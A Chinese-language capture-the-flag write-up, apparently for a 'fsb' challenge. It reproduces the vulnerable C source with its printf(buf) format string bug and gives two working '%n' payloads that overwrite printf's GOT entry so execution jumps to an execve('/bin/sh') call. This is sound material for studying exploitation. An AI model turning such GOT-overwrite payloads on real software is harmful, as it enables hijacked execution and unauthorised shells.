前言
这是一道考察printf
格式化字符串漏洞利用的题目,总的来说很简单,但是我却花了很长时间,主要是我有点太马虎没仔细分析代码,笑哭。
分析
先分析源代码fsb.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
unsigned long long key;
char buf[100];
char buf2[100];
int fsb(char** argv, char** envp){
char* args[]={"/bin/sh", 0};
int i;
char*** pargv = &argv;
char*** penvp = &envp;
char** arg;
char* c;
for(arg=argv;*arg;arg++) for(c=*arg; *c;c++) *c='\0';
for(arg=envp;*arg;arg++) for(c=*arg; *c;c++) *c='\0';
*pargv=0;
*penvp=0;
for(i=0; i<4; i++){
printf("Give me some format strings(%d)\n", i+1);
read(0, buf, 100);
printf(buf);
}
printf("Wait a sec...\n");
sleep(3);
printf("key : \n");
read(0, buf2, 100);
unsigned long long pw = strtoull(buf2, 0, 10);
if(pw == key){
printf("Congratz!\n");
execve(args[0], args, 0);
return 0;
}
printf("Incorrect key \n");
return 0;
}
int main(int argc, char* argv[], char** envp){
int fd = open("/dev/urandom", O_RDONLY);
if( fd==-1 || read(fd, &key, 8) != 8 ){
printf("Error, tell admin\n");
return 0;
}
close(fd);
alloca(0x12345 & key);
fsb(argv, envp); // exploit this format string bug!
return 0;
}
程序先获得一个8字节的随机数存于全局变量key
中,然后调用alloca
函数在栈上分配内存。之后调用fsb
函数。在这个函数内部要想达到exeve
函数执行shell,就必须输入正确的key
值。
这个fsb
函数在printf(buf)
处存在格式化字符串漏洞,关于漏洞利用网上有很多就不罗嗦了。那么要getshell其实方法有很多,可以改写got
表也可以leak
出key的值。这里直接改写got
表好了,可以把printf
的地址改写为要执行shell的地址,这样当执行printf
时就跳到shell中了。
下面是exp1
2
3//各种地址和偏移在反汇编代码中就可以看出来,就不一一分析了
%134520836c%14$n //把printf的got表地址写入fsb函数的第一个参数中(方法很多你可以写到栈上的很多位置)
%134514347c%20$n //向printf的got表写入要执行shell的地址
1 | fsb@ubuntu:~$ ./fsb >/dev/null 2>&1 |
要注意的是需要把程序的标准输出和错误输出重定向到/dev/null
,这样就不会因为输出数据过多而卡死了。
总结
还是简单的格式化字符串漏洞的题目,利用方法很多,当时因为一直想通过alloca
函数来计算key
而浪费了很多时间,然而这样计算出来的只是前4字节,唉要细心啊。。